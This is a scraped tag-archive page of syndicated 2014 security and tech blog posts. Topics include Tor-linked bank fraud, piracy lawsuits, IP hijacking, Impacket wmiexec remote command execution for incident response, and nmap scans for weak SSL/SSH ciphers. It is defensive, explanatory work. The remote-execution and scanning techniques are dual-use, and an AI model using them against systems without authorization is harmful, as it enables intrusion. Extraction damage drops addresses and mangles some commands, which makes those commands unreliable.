Posts tagged ‘ip address’

SANS Internet Storm Center, InfoCON: green: GMail quirk used to subvert website spam tracking, (Wed, Dec 10th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Yesterday while reviewing our logs here at the SANS Internet Storm Center I stumbled upon these:

login failed for
login failed for
login failed for
login failed for

The reason this caught my eye is because I recall reading that GMail ignores periods in email addresses. For example, if I register but then begin sending email to, it will arrive in my new inbox despite the additional periods.

Many blog and forum platforms have functionality for banning by email address. Spammers can use the periods in GMail addresses to subvert such banning controls by registering again without having to produce a truly new email address. Do your systems and/or websites allow for registering multiple accounts this way?

Where this becomes more interesting is that these logs indicate visitors that tried to log in using these email addresses without having even attempted to register them first. None of the above logs come from a single IP address, though the first two do come from a single IP range. Is this due to a poorly programmed bot, or is it indicative of something else?

Let us know what you think in the comments!

Alex Stanford – GIAC GWEB GSEC,
Research Operations Manager,
SANS Internet Storm Center

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Microsoft Sues ‘Does’ For Activating Pirated Software

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

microsoft-pirateDespite being one of the most pirated software vendors in the world, Microsoft doesn’t have a long track record of cracking down on individual pirates.

In fact, two months ago Microsoft CEO Satya Nadella noted that in some cases piracy can act as a conversion tool.

“We’ve always had freemium. Sometimes our freemium was called piracy,” Nadella said, adding that the usage first approach has its advantages.

This doesn’t mean that all pirates can have their way though. Microsoft does keep a close eye on the unauthorized use of its products with help from its in house cybercrime center.

Late last week Microsoft filed a copyright infringement lawsuit against a person (or persons) who activated pirated copies of Windows 7 and Office 10 from an AT&T Internet connection.

“Microsoft’s cyberforensics have identified a number of product key activations originating from IP address, which is presently assigned to ISP AT&T Internet Services..,” the complaints (pdf) reads.

“These activations have characteristics that on information and belief, establish that Defendants are using the IP address to activate pirated software.”

While many people believe that unauthorized copies are hard for Microsoft to detect, the company explains that its cybercrime team leverages state-of-the-art technology to detect software piracy.

The company describes its investigative approach as cyberforensics. Among other things, they look for activation patterns and characteristics which make it likely that certain IP-addresses are engaged in unauthorized copying.

“As part of its cyberforensic methods, Microsoft analyzes product key activation data voluntarily provided by users when they activate Microsoft software, including the IP address from which a given product key is activated,” the company writes.

According to the complaint, the defendant(s) in this case have activated numerous copies of Windows 7 and Office 2010 with suspicious keys. These keys were likely stolen from Microsoft’s supply chain, used without permission from the refurbisher channel, and used more often than the license permits.

Microsoft is now looking to identify the person or persons responsible for the copyright and trademark infringements, to recoup the damage they’ve suffered.

From the descriptions used in the complaint it seems likely that the target is not an average user, but someone who sells computers containing pirated software. Time will tell whether that’s indeed the case.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Treasury Dept: Tor a Big Source of Bank Fraud

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

A new report from the U.S. Treasury Department found that a majority of bank account takeovers by cyberthieves over the past decade might have been thwarted had affected institutions known to look for and block transactions coming through Tor, a global communications network that helps users maintain anonymity by obfuscating their true location online.

The findings come in a non-public report obtained by KrebsOnSecurity that was produced by the Financial Crimes Enforcement Network (FinCEN), a Treasury Department bureau responsible for collecting and analyzing data about financial transactions to combat domestic and international money laundering, terrorist financing and other financial crimes.

In the report, released on Dec. 2, 2014, FinCEN said it examined some 6,048 suspicious activity reports (SARs) filed by banks between August 2011 and July 2014, searching the reports for those involving one of more than 6,000 known Tor network nodes. Investigators found 975 hits corresponding to reports totaling nearly $24 million in likely fraudulent activity.

“Analysis of these documents found that few filers were aware of the connection to Tor, that the bulk of these filings were related to cybercrime, and that Tor related filings were rapidly rising,” the report concluded. “Our BSA [Bank Secrecy Act] analysis of 6,048 IP addresses associated with the Tor darknet [link added] found that in the majority of the SAR filings, the underlying suspicious activity — most frequently account takeovers — might have been prevented if the filing institution had been aware that their network was being accessed via Tor IP addresses.”

Tables from the FinCEN report.

Tables from the FinCEN report.

FinCEN said it was clear from the SAR filings that most financial institutions were unaware that the IP address where the suspected fraudulent activity occurred was in fact a Tor node.

“Our analysis of the type of suspicious activity indicates that a majority of the SARs were filed for account takeover or identity theft,” the report noted. “In addition, analysis of the SARs filed with the designation ‘Other revealed that most were filed for ‘Account Takeover,’ and at least five additional SARs were filed incorrectly and should have been ‘Account Takeover.’”

The government also notes that there has been a fairly recent and rapid rise in the number of SAR filings over the last year involving bank fraud tied to Tor nodes.

“From October 2007 to March 2013, filings increased by 50 percent,” the report observed. “During the most recent period — March 1, 2013 to July 11, 2014 — filings rose 100 percent.”

While banks may be able to detect and block more fraudulent transactions by paying closer attention to or outright barring traffic from Tor nodes, such an approach is unlikely to have a lasting impact on fraud, said Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley.

“I’m not surprised by this: Tor is easy for bad actors to use to isolate their identity,” Weaver said “Yet blocking all Tor will do little good, because there are many other easy ways for attackers to hide their source address.”

Earlier this summer, the folks who maintain the Tor Project identified this problem — that many sites and even ISPs are increasingly blocking Tor traffic because of its abuse by fraudsters — as an existential threat to the anonymity network. The organization used this trend as a rallying cry for Tor users to consider lending their brainpower to help the network thrive in spite of these threats.

A growing number of websites treat users from anonymity services differently Slashdot doesn’t let you post comments over Tor, Wikipedia won’t let you edit over Tor, and Google sometimes gives you a captcha when you try to search (depending on what other activity they’ve seen from that exit relay lately),” wrote Tor Project Leader Roger Dingledine. “Some sites like Yelp go further and refuse to even serve pages to Tor users.”

Dingledine continued:

“The result is that the Internet as we know it is siloing. Each website operator works by itself to figure out how to handle anonymous users, and generally neither side is happy with the solution. The problem isn’t limited to just Tor users, since these websites face basically the same issue with users from open proxies, users from AOL, users from Africa, etc.

Weaver said the problem of high volumes of fraudulent activity coming through the Tor Network presents something of a no-win situation for any website dealing with Tor users.

“If you treat Tor as hostile, you cause collateral damage to real users, while the scum use many easy workarounds.  If you treat Tor as benign, the scum come flowing through,” Weaver said. “For some sites, such as Wikipedia, there is perhaps a middle ground. But for banks? That’s another story.”

SANS Internet Storm Center, InfoCON: green: Automating Incident data collection with Python, (Thu, Dec 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

One of my favorite Python modules isImpacketby the guys at Core Labs. Among other things it allows me to create Python scripts that can speak to Windows computers over SMB. I can use it to map network drives, kill processes on a remote machine and much more. During an incident having the ability to reach out to allthe machines in your environment to list or kill processes is very useful. Python andImpacketmake this very easy. Check it out.

After installing Impacketall of the awesome modules are available for use in your Python scripts. In addition to the modules,Impacket also includes several sample programs. Awesome tools like gives you functionalitylike Microsofts PSEXECplus pass-the-hash in an easily automatedformat. Have you ever wished you could run wmic commands from linux? Let use to run a command on a remote windows machine from Linux. You just provide the tools with a username, password, Target IP address and a wmic command to run on the target machine. For example, this is how” />

WMIC from my linux server is awesome, but the best part is thatthis is Python!. So instead of running I can import it as a module and use in a python script. Ill start out in the same directory as wmiexec and launch python. Then import wmiexec and create a variable to hold a WMIEXEC object. In this case Ill create a variable called wmiobjthat points to a WMIEXEC object. The first argument is the command I want to run. In this case I run a WMIC command that willthat finds the path of the executable for every copy of a process with cmd somewhere in the process name. The only other arguments are the username, password and share=ADMIN$.” />

In this case one of the command prompts is running from a users temporary directory. That merits some additional investigation! With those 3 simple lines of Python code we were able to automate the query to a single host. Because it is Python we can easily use a for loop torun this on every workstation on our network, capture those result and compare them. Find the host with processes that arent running on any of the the otherhosts! Find the host with unique unusual network connections! Then, if the conditions are right, automate something to isolate it.

Interested in learning more? Come check out SEC573 Python for Penetration Testers. You will learn Pythonstarting from ground zero and learn how to automate all the things. Join me at CyberGuardian on March 2 or in Orlando on April 11.

Check out the courses here:

Mark Baggett


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: Flushing out the Crypto Rats – Finding “Bad Encryption” on your Network, (Mon, Dec 1st)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Just when folks get around to implementing SSL, we need to retire SSL! Not a week goes buy that a client isnt asking me about SSL (or more usually TLS) vulnerabilities or finding issues on their network.

In a recent case, my client had just finished a datacenter / PCI audit, and had one of his servers come up as using SSL 2.0, which of course has been deprecated since 1996 – the auditors recommendation was to update to SSL 3.0 (bad recommendation, keep reading on).”>1/ W-a-a-a-y too many assessments consist of scanning the target, and pasting the output of the scanning tool into the final report. “>2/ In this case, the person writing the report had either not read the text they were pasting, or was not knowledgeable enough to understand that updating from SSL 2 to SSL 3 wasnt going to get to a final good state. Shame on them either way!

As a side note, if the site (it was on an internal network remember) was running plain old HTTP, then the scanner would not have identified a problem, and the person behind the scanner would very likely have missed this completely! (OOPS)

Anyway, my clients *real* question was how can we scan our network for vulnerable SSL versions and ciphers, but not pay big bucks for an enterprise scanning tool or a consultant?

My answer was (that day) – NMAP of course!

To check for weak or strong ciphers on a server or subnet, use the script ssl-enum-ciphers”>nmap -Pn -p443 –script=ssl-enum-ciphers”>Nmap scan report for (
Host is up (0.097s latency).
rDNS record for
443/tcp open https
| ssl-enum-ciphers:
| SSLv3: No supported ciphers found
| TLSv1.0:
| ciphers:
| compressors:
| TLSv1.1:
| ciphers:
| compressors:
| TLSv1.2:
| ciphers:
| TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 – strong
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 – strong
| TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 – strong
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 – strong
| TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 – strong
| compressors:
|_”>Nmap done: 1 IP address (1 host up) scanned in 34.63 seconds

You can scan specifically for SSHv2 devices using the script sshv2.nse”>nmap -Pn -p443 –open”>Nmap scan report for
Host is up (0.029s latency).
443/tcp open https
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
MAC Address: 00:E0:81:CE:9E:74 (Tyan Computer)

NMAP also has scripts ssl-heartbleed script (if youre still focused on that), and has an ssl-poodle script, but youll need to download that one from their script page at – its not in the base installation.

While youre at it, take a look at cipher support on any SSH enabled devices on your network – you are likely to be surprised at what you find. For instance, this is the management interface of my home firewall – Im not thrilled with the 3des-cbc and MD5 support, but I guess thats why there”>Nmap scan report for
Host is up (0.0020s latency).
22/tcp open ssh
| ssh2-enum-algos:
| kex_algorithms: (1)
| diffie-hellman-group1-sha1
| server_host_key_algorithms: (1)
| ssh-rsa
| encryption_algorithms: (4)
| aes128-cbc
| 3des-cbc
| aes192-cbc
| aes256-cbc
| mac_algorithms: (4)
| hmac-sha1
| hmac-sha1-96
| hmac-md5
| hmac-md5-96
| compression_algorithms: (1)
|_”>Nmap done: 1 IP address (1 host up) scanned in 47.39 seconds

Or, for a real eye-opener, scan your subnet for SSHv1 enabled devices – note that this scan (and the previous one) assumes that your SSH service is on port 22. In a zero knowledge scan, youd of course scan a wider range of ports (all of them if there”>nmap -Pn -p22 –script=sshv1.nse

This scan didnt find anything at my house, but it *always* finds stuff at client sites!

What crypto support issues have you found when you scanned for them? And how long do you thing these problems were there? Please, share your story using our comment link!

Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Errata Security: The Pando Tor conspiracy troll

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Tor, also known as The Onion Router, bounces your traffic through several random Internet servers, thus hiding the source. It means you can surf a website without them knowing who you are. Your IP address may appear to be coming from Germany when in fact you live in San Francisco. When used correctly, it prevents eavesdropping by law enforcement, the NSA, and so on. It’s used by people wanting to hide their actions from prying eyes, from political dissidents, to CIA operatives, to child pornographers.

Recently, Pando (an Internet infotainment site) released a story accusing Tor of being some sort of government conspiracy.

This is nonsense, of course. Pando’s tell-all exposé of the conspiracy contains nothing that isn’t already widely known. We in the community have long joked about this. We often pretend there is a conspiracy in order to annoy uptight Tor activists like Jacob Appelbaum, but we know there isn’t any truth to it. This really annoys me — how can I troll about Tor’s government connections when Pando claims there’s actually truth to the conspiracy?

The military and government throws research money around with reckless abandon. That no more means they created Tor than it means they created the Internet back in the 1970s. A lot of that research is pure research, intended to help people. Not everything the military funds is designed to kill people.

There is no single “government”. We know, for example, that while some in government paid Jacob Appelbaum’s salary, others investigated him for his Wikileaks connections. Different groups are often working at cross purposes — even within a single department.

A lot of people have ties to the government, including working for the NSA. The NSA isn’t some secret police designed to spy on Americans, so a lot of former NSA employees aren’t people who want to bust privacy. Instead, most NSA employees are sincere in making the world a better place — which includes preventing evil governments from spying on dissidents. As Snowden himself says, the NSA is full of honest people doing good work for good reasons. (That they’ve overstepped their bounds is a problem — but that doesn’t mean they are the devil).

Tor is based on open code and math. It really doesn’t matter what conspiracy lies behind it, because we can see the code. It’s like BitCoin — we know there is a secret conspiracy behind it, with the secretive Satoshi Nakamoto owning a billion dollars worth of the coins. But that still doesn’t shake our faith in the code and the math.

Dissidents use Tor — successfully. We know that because the dissidents are still alive. Even if it’s a secret conspiracy by the U.S. government, it still does what its supporters want, helping dissidents fight oppressive regimes. In any case, Edward Snowden, who had access to NSA secrets, trusts his own life to Tor.

Tor doesn’t work by magic. I mention this because the Pando article lists lots of cases where Tor failed to protect people. The reasons were unlikely to have been flaws in Tor itself, but appear to have been other more natural causes. For example, the Silk Road server configuration proves it was open to the Internet as well as through Tor, a rookie mistake that revealed its location. The perfect concealment system can’t work if you sometimes ignore it. It’s like blaming the Pill for not preventing pregnancy because you took it only on some days but not others. Thus, for those of us who know technically how things work, none of the cases cited by Pando shake our trust in Tor.

I’m reasonably technical. I’ve read the Tor spec (though not the code). I play with things like hostile exit nodes. I fully know Tor’s history and ties to the government. I find nothing in the Pando article that is credible, and much that is laughable. I suppose I’m guilty of getting trolled by this guy, but seriously, Pando pretends not to be a bunch of trolls, so maybe this deserves a response.

SANS Internet Storm Center, InfoCON: green: Guest diary: Detecting Suspicious Devices On-The-Fly, (Tue, Nov 25th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

If you apply classic hardening rules (keep the patch level, use an AV, enable the firewall and use them with due diligence), modern operating systems are more and more difficult to compromise today. Extra tools like EMET could also raise the bar. On the other side, networks are more and more populated with unknown/personal devices or devices which provide multiple facilities like storage (NAS), printers (MFP), VoIP, IP camera, …

Being easily compromised, they became a very good target to pivot into the network. They run out-of-the-box, just plug the network/power cables and they are ready to go! A classic vulnerability management process will detect such devices but you still have the risk to miss them if you run a monthly scan! To catch new devices on the fly and to have an immediate idea of their attack surface (example: is there a backdoor present), Im using the following toolbox: Arpwatch, Nmap and OSSEC as the conductor.

Arpwatch is a tool for monitoring ARP traffic on a LAN. It can detect new MAC addresses or pairing changes (IP/MAC). Nmap is the most known port scanner and OSSEC is a log management tool with many features like a built-in HIDS.

A first good news is that Arpwatch log entries are processed by default in OSSEC. It has a great feature called Active-Response which allows to trigger actions (read: execute scripts) in specific conditions. In our case,” />

The above configuration specifies that will be executed with the argument srcip (reported by Arpwatch) on the agent 001 when the rule 7201 or 7202 will match (when a new host or a MAC address change is detected). The script is based on the existing active-response scripts and spawns a Nmap scan:

nmap -sC -O -oG – -oN ${PWD}/../logs/${IP}.log ${IP} | grep Ports: ${PWD}/../logs/gnmap.log

This command will output interesting information in grepable format to the gnmap.log file: the open ports (if any) of the detected IP like in the example below. One line per host will be generated:

Host: ( Ports: 22/open/tcp//ssh///, 80/open/tcp///,3306/open/tcp/// …

OSSEC is a wonderful tool and can decode this by default. Just configure the gnmap.log as a new events source:

And new alerts will be generated:

2014 Oct 27 17:54:23 (shiva)
Rule: 581 (level 8) – Host information added.
Host: (, open ports: 22(tcp) 80(tcp) 3306(tcp)

By using this technique, you will immediately detect new hosts connected to the network (or if an IP address is paired with a new MAC address) and youll get the list of the services running on it as well as the detected operating system (if the fingerprinting is successful). Happy hunting!

Xavier Mertens

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Errata Security: That wraps it up for end-to-end

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

The defining feature of the Internet back in 1980 was “end-to-end”, the idea that all the intelligence was on the “ends” of the network, and not in middle. This feature is becoming increasingly obsolete.

This was a radical design at the time. Big corporations and big government still believed in the opposite model, with all the intelligence in big “mainframe” computers at the core of the network. Users would just interact with “dumb terminals” on the ends.

The reason the Internet was radical was the way it gave power to the users. Take video phones, for example. AT&T had been promising this since the 1960s, as the short segment in “2001 A Space Odyssey” showed. However, getting that feature to work meant replacing all the equipment inside the telephone network. Telephone switches would need to know the difference between a normal phone call and a video call. Moreover, there could be only one standard, world wide, so that calling Japan or Europe would work with their video telephone systems. Users were powerless to develop video calling on their own — they would have to wait for the big telcom monopolies to develop it, however long it took.

That changed with the Internet. The Internet carries packets without knowing their content. Video calling with Facetime or Skype or LINE is just an app, from your iPhone or Android or PC. People keep imagining new applications for the Internet every day, and implement them, without having to change anything in core Internet routing hardware.

I’ve used Facetime, Skype, and LINE to talk to people in Japan. That’s because there is no real international standard for video calling. Each person I call requires me to install whichever app they are using. Traditional thinking is that government ought to create standards, so that every app would be compatible with every other app, so that I could Skype from Windows to somebody’s iPhone using Facetime. This tradition is nonsense. If we waited for government standards, it’d take forever. Teenagers who heavily use video today would be grown up with kids of their own before government got around to creating the right standard. Lack of standards means freedom to innovate.

Such freedom was almost not the case. You may have heard of something called the “OSI 7 Layer Model”. Everything you know about that model is wrong. It was an attempt by Big Corporations and Big Government to enforce their model of core-centric networking. It demanded such things as a “connection oriented network protocol”, meaning smart routers rather than the dumbs ones we have today. It demanded that applications be standardized, so that there would be only one video conferencing standard, for example. Governments in US, Japan, and Europe mandated that the computers they bought supporting OSI conformant protocols. (The Internet’s TCP/IP protocols do not conform to the OSI model.) Such rules were on the book through into the late 1990s dot-com era, when many in government still believed that the TCP/IP Internet was just a brief experiment on the way to a Glorious Government OSI Internetwork.

The Internet did have standards, of course, but they were developed in the opposite manner. Individuals innovated first, on the ends of the network, developing apps. Only when such apps became popular did they finally get documented as a “standard’. In other words, Internet standards we more de facto than de jure. People innovated first, on their own ends of the network, and the infrastructure and standards caught up later.

But here’s the thing: the Internet ideal of end-to-end isn’t perfect, either. There are reasons why not all innovation happens on the ends.

Take your home network as an example. The way your home likely works is that you have a single home router with cable/fiber/DSL on one side talking to the Internet, and WiFi on the other side talking to the devices in your home. Attached to your router you have a desktop computer, a couple notebooks, an iPad, your phones, an Xbox/Playstation, and your TV.

In the true end-to-end model, all these devices would be on the Internet directly — that they could be “pinged” from the Internet. In today’s reality, though, that’s not the way things work. Your home router is a firewall. It blocks incoming connections, so that devices in your home can connect outwards, but nothing on the Internet can connect inwards. This fundamentally breaks the ideal of end-to-end, as a smart device sits in the network controlling access to the ends.

This is done for two reasons. The first is security, so that hackers can’t hack the devices in your home. Blocking inbound traffic blocks 99% of hacker attacks against devices.

The second reason for smart home routers is the well-known limitation on Internet addresses: there are only 4 billion of them. However, there are more than 4 billion devices connected to the Internet. This fix this, your home router does address translation. Your router has only a single public Internet address. All the devices in your home have private addresses that wouldn’t work on the Internet. As packets flow in/out of your home, your router transparently changes the private addresses in the packets into the single public address.

Thus, when you google “what’s my IP address“, you’ll get a different address than your local machine. Your machine will have a private address like 10.x.x.x or 192.168.x.x, but servers on the Internet won’t see that — they’ll see the public address you’ve been assigned by your ISP.

According to Gartner, nearly billion smarthphones were sold in 2013. These are all on the Internet. That represents a quarter of the Internet address space used up in only a single year. Yet, virtually none of them are assigned real Internet addresses. Almost all of them are behind address translators — not the small devices like you have in your home, but massive translators that can handle millions of simultaneous devices.

The consequence is this: there are more devices with private addresses, that must go through translators, than there are devices with public addresses. In other words, less than 50% of the Internet is end-to-end.

The “address space exhaustion” of tradition Internet addresses inspired an update to the protocol to use larger addresses, known as IPv6. It uses 128-bit addresses, or 4 billion times 4 billion times 4 billion times 4 billion. This is enough to assign a unique address to all the grains of sand on all the beaches on Earth. It’s enough to restore end-to-end access to every device on the Internet, times billions and billlions.

My one conversation with Vint Cerf (one of the key Internet creators) was over this address space issue. Back in 1992, every Internet engineer knew for certain that the Internet would run out of addresses by around the year 2000. Every engineer knew this would cause the Internet to collapse. At the IETF meeting, I tried to argue otherwise. I used the Simon-Ehrlich Wager as an analogy. Namely, the 4 billion addresses weren’t a fixed resource, because we would become increasingly efficient at using them. For example, “dynamic” addresses would use space more efficiently, and translation would reuse addresses.

Cerf’s response was the tautology “but that would break the end-to-end principle”.

Well, yes, but no such principle should be a straightjacket. The end-to-end principle is already broken by hackers. Even with IPv6, when all your home devices have a public rather than private address on the Internet, you still want a firewall breaking the end-to-end principle blocking inbound connections. Once you’ve decided to firewall a network, it no longer matters whether it’s using IPv6 or address translation of private addresses. Indeed, address translation is better for firewalling, as it defaults to “fail close”. That means if a failure occurs, all communication is blocked. With IPv6, firewalls become “fail open”, where failures allow communication to continue.

Firewalls are only the start in breaking end-to-end. It’s the “cloud” where we see a radical reversion back to old principles.

Your phone is no longer a true “end” of the network. Sure, your phone has a powerful processor that’s faster than supercomputers of the last decade, but that power is used primarily for display not for computation. Your data and computation is instead done in the cloud. Indeed, when you lose or destroy your phone, you simply buy a new one and “restore” it form the cloud.

Thus, we are right back to the old world of smart core network with “mainframes”, and “dumb terminals” on the ends. That your phone has supercomputer power doesn’t matter — it still does just what it’s told by the cloud.

But the last nail in the coffin to the “end-to-end” principle is the idea of “net neutrality”. While many claim it’s a technical concept, it’s just a meaningless political slogan. Congestion is an inherent problem of the Internet, and no matter how objectively you try to solve it, it’ll end up adversely affecting somebody — somebody who will then lobby politicians to rule in their favor. The Comcast-NetFlix issue is a good example where the true technical details are at odds with the way this congestion issue has been politicized. Things like “fast-lanes” are everywhere, from content-delivery-networks to channelized cable/fiber. Rhetoric creates political distinctions among various “fast-lanes” when there are no technical distinctions.

This politicization of the Internet ends the personal control over the Internet that was promised by end-to-end. Instead of being able to act first and asking for forgiveness later, you must first wait for permission from Big Government. Instead of being able to create your own services, you must wait for Big Corporations (the only ones that can afford lawyers to lobby government) to deliver those services to you.


We aren’t going to regress completely to the days of mainframes, of course, but we’ve given up much of the territory of individualistic computing. In some ways, this is a good thing. I don’t want to manage my own data, losing it when a hard drive crashes because I forgot to back it up. In other ways, it’s a bad thing. The more we regulate the Internet to insure good things, the more we stop innovations that don’t fit within our preconceived notions. Worse, the more it’s regulated, the more companies have to invest in lobbying the government for favorable regulation, rather than developing new technology..

TorrentFreak: If Illegal Sites Get Blocked Accidentally, Hard Luck Says Court

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

blockedThe movie and music industries have obtained several High Court orders which compel UK ISPs to block dozens of websites said to facilitate access to copyright-infringing content. Recently, however, they have been joined by those seeking blockades on trademark grounds.

The lead case on this front was initiated by Cartier and Mont Blanc owner Richemont. The company successfully argued that several sites were infringing on its trademarks and should be blocked by the UK’s leading ISPs.

The case is important not only to trademark owners but also to those operating in the file-sharing arena since the High Court is using developments in one set of cases to determine the outcome of legal argument in the other.

The latest ruling concerns potential over-blocking. In some cases target sites move to IP addresses that are shared with other sites that are not covered by an injunction. As a result, these third-party sites would become blocked if ISPs filter their IP addresses as ordered by the Court.

To tackle this problem Richemont put forward a set of proposals to the Court. The company suggested that it could take a number of actions to minimize the problem including writing to the third-party sites informing them that a court order is in force and warning them that their domains could become blocked. The third party sites could also be advised to move to a new IP address.

Complicating the issue is the question of legality. While third-party sites aren’t mentioned in blocking orders, Richemont views some of them as operating unlawfully. When the company’s proposals are taken as a package and sites are operating illegally, Richemont believes ISPs should not be concerned over “collateral damage.”

Counsel for the ISPs disagreed, however, arguing that the Court had no jurisdiction to grant such an order. Mr Justice Arnold rejected that notion and supported Richemont’s efforts to minimize over-blocking in certain circumstances.

“The purpose of Richemont’s proposal is to ensure that the [blocking] order is properly targeted, and in particular to ensure that it is as effective as possible while avoiding what counsel for Richemont described as ‘collateral damage’ to other lawful website operators which share the same IP address,” the Judge wrote.

“If the websites are not engaged in lawful activity, then the Court need not be concerned about any collateral damage which their operators may suffer. It is immaterial whether the Court would have jurisdiction, or, if it had jurisdiction, would exercise it, to make an order requiring the ISPs to block access to the other websites.”

The ISPs further argued that the Court’s jurisdiction to adopt Richemont’s proposals should be limited to sites acting illegally in an intellectual property rights sense. The argument was rejected by the Court.

Also of note was the argument put forward by the ISPs that it is the Court’s position, not anyone else’s, to determine if a third-party site is acting illegally or not. Justice Arnold said he had sympathy with the submission, but rejected it anyway.

“As counsel for Richemont submitted, the evidence shows that, in at least some cases, it is perfectly obvious that a particular website which shares an IP address with a Target Website is engaged in unlawful activity. Where there is no real doubt about the matter, the Court should not be required to rule,” the Judge wrote.

“Secondly, and perhaps more importantly, Richemont’s proposal gives the operators of the affected websites the chance either to move to an alternative server or to object before the IP address is blocked. If they do object, the IP address will not be blocked without a determination by the Court.”

In summary, any third-party sites taken down after sharing an IP address with a site featured in a blocking order will have no sympathy from the High Court, if at Richemont’s discretion they are acting illegally. The fact that they are not mentioned in an order will not save them, but they will have a chance to appeal before being blocked by UK ISPs.

“This action is about protecting Richemont’s Maisons and its customers from the sale of counterfeit goods online through the most efficient means, it is not about restricting freedom of speech or legitimate activity,” the company previously told TF.

“When assessing a site for blocking, the Court will consider whether the order is proportionate – ISP blocking will therefore only be used to prevent trade mark infringement where the Court is satisfied that it is appropriate to do so.”

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Liam Neeson Downloaders Face Anti-Piracy Shakedown

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

File-sharers in the United States, Germany and the UK are particularly familiar with the tactics of so-called copyright trolls. In recent years the lucrative nature of the business has attracted many companies, all out to turn piracy into profit.

Most countries have managed to avoid the attentions of these outfits, Sweden, the spiritual home of The Pirate Bay, included. However, in a surprise move the Scandinavian country has now appeared on the file-sharing lawsuit radar.

Along with Universal Pictures and Studio Canal, Check Entertainment is one of the companies behind the 2014 Liam Neeson movie, Non-Stop. According to latest figures from Box Office Mojo it has done very well, bringing in excess of $222 million on a $50 million budget.

Nevertheless, according to Dagens Media, Check Entertainment has hired lawfirm Nordic Law to go to court in Sweden to obtain the identities of individuals said to have downloaded and shared the action thriller.

The U.S.-based company has targeted subscribers of five local Internet service providers – Com Hem, Bredbandsbolaget, Banhof, Telia Sonera and Telenor – with the aim of forcing them to turn over the names and addresses of 12 of their Internet subscribers. Data on the alleged file-sharers was captured by German anti-piracy outfit Excipio.

At this point Check Entertainment says it wants to “investigate and prosecute” the subscribers for alleged copyright infringement but if cases in the rest of the world are any yardstick the aim will be a cash settlement, not a full court case.

Interestingly, one ISP from the five has indicated that its customers do not have to be concerned about possible lawsuits or shakedowns.

Service provider Banhof, a company long associated with subscriber privacy, says it is currently the only ISP in the Swedish market that does not store data on its customers’ Internet activities.

The development dates back to April when the EU Court of Justice declared the Data Retention Directive to be invalid. In response, many Swedish ISPs stopped storing data but since then most have reversed their decision to comply with apparent obligations under the Swedish Electronic Communications Act. Banhof did not, however.

This means that even if the ISP is ordered by the court to reveal which subscribers were behind a particular IP address at a certain time, it has no data so simply cannot comply.

“We have no such data. We turned off data storage on the same day that the EU judgment was handed down,” Banhof CEO Jon Karlung told Dagens Media.

While Sweden has a long tradition of file-sharing and the state regularly prosecutes large scale file-sharers, actions against regular sharers of a single title are extremely rare, ‘trolling’ even more so.

“It’s pretty rare,” Karlung says. “It has been quite a long time since it happened last.”

The big question now is whether the courts will be sympathetic to Check Entertainment’s complaint.

“We have submitted [our case] to the district court and now we want to see what the service providers say in response,” Nordic Law’s Patrick Andersson concludes.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Network Hijackers Exploit Technical Loophole

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Spammers have been working methodically to hijack large chunks of Internet real estate by exploiting a technical and bureaucratic loophole in the way that various regions of the globe keep track of the world’s Internet address ranges.

Last week, KrebsOnSecurity featured an in-depth piece about a well-known junk email artist who acknowledged sending from two Bulgarian hosting providers. These two providers had commandeered tens of thousands of Internet addresses from ISPs around the globe, including Brazil, China, India, Japan, Mexico, South Africa, Taiwan and Vietnam.

For example, a closer look at the Internet addresses hijacked by one of the Bulgarian providers — aptly named “Mega-Spred” with an email contact of “abuse@grimhosting” — shows that this provider have been slowly  gobbling up far-flung IP address ranges since late August 2014.

This table, with data from the RIPE NCC -- of the regional Internet Registries, shows IP address hijacking activity by Bulgarian host Mega-Spred.

This table, with data from the RIPE NCC — of the regional Internet Registries, shows IP address hijacking activity by Bulgarian host Mega-Spred.

According to several security and anti-spam experts who’ve been following this activity, Mega-Spred and the other hosting provider in question (known as Kandi EOOD) have been taking advantage of an administrative weakness in the way that some countries and regions of the world keep tabs on the IP address ranges assigned to various hosting providers and ISPs.

IP address hijacking is hardly a new phenomenon. Spammers sometimes hijack Internet address ranges that go unused for periods of time. Dormant or “unannounced” address ranges are ripe for abuse partly because of the way the global routing system works: Miscreants can “announce” to the rest of the Internet that their hosting facilities are the authorized location for given Internet addresses. If nothing or nobody objects to the change, the Internet address ranges fall into the hands of the hijacker.

